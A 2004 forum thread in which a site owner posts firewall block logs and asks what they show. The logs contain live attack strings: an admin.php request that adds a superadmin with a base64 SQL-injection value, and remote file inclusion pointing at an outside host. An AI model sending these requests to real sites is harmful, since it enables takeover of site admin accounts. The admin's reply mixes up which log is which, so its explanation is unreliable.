Attempt foiled I think

New Member Joined: Jun 17, 2004 Posts: 10

Code:

Date & Time: 2004-06-24 10:47:58


Blocked IP: 61.11.16.21


User ID: Anonymous (1)


Reason: Abuse - AUTHORS


--------------------


User Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)


Query String: www.mysite.com//admin.php?op=AddAuthor&add_aid=654321&add_name=God&add_pwd=123456&add_email=info@data-iran.net&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox


Forwarded For: 61.11.16.21


Client IP: none


Remote Address: 203.208.155.181


Remote Port: 51099


Request Method: GET

Is that what I think it is, some peep from foriegn lands trying to gain god admin access.

If so thank you guys.
btw: It was installed only a day.
I'm always well patched but extra security always advised.

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

That's exactly what it is - the admin.php exploit Wink

Posted: Sun Jun 27, 2004 5:14 am

What about this one

Code:

Date & Time: 2004-06-27 06:20:23


Blocked IP: 81.23.227.170


User ID: Anonymous (1)


Reason: Abuse - OTHER


--------------------


User Agent: curl/7.9.8 (i686-suse-linux) libcurl 7.9.8 (OpenSSL 0.9.6g) (ipv6 enabled)


Query String: www.mysite.com/modules.php?name=http://217.59.104.226/&file=http://217.59.104.226/&t=http://217.59.104.226/&view=http://217.59.104.226/


Forwarded For: none


Client IP: none


Remote Address: 81.23.227.170


Remote Port: 10067


Request Method: GET

Posted: Sun Jun 27, 2004 5:17 am

And this one

Code:

Date & Time: 2004-06-27 03:55:44


Blocked IP: 212.174.96.215


User ID: Anonymous (1)


Reason: Abuse - AUTHORS


--------------------


User Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Opera 7.51  [en]


Query String: www.mysite.com/admin.php?op=AddAuthor&add_aid=zamans&add_name=mysevgi&add_pwd=zamans&add_email=admin@mysevgi.net&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox


Forwarded For: none


Client IP: none


Remote Address: 212.174.96.215


Remote Port: 12509


Request Method: GET

Sorry I'm thinking if peeps posted all the attempts & an admin added a description to each one on if its a hack attempt or a simple query by an innocent visitor it might help in evaluating should we unban them.

Posted: Sun Jun 27, 2004 5:20 am

Another one

Code:

Date & Time: 2004-06-26 08:32:45


Blocked IP: 209.237.238.181


User ID: Anonymous (1)


Reason: Abuse - AGENT


--------------------


User Agent: ia_archiver


Query String: www.mysite.com/modules.php


Forwarded For: none


Client IP: none


Remote Address: 209.237.238.181


Remote Port: 44899


Request Method: GET

Posted: Sun Jun 27, 2004 7:37 am

Well, look at the REASON! The first one is an attempt to redirect you to a hacker's site. The second one is trying to add a superadmin to your admin table. The third one is alerting you that a harvester agent is trying to rape your site. The REASON line tells you what you need to know Wink

Posted: Sun Jun 27, 2004 12:31 pm

Thanks raven, new to the types of threath, never hurts to ask.

Posted: Sun Jun 27, 2004 12:46 pm

- Just pulling your chain a little. Twisted Evil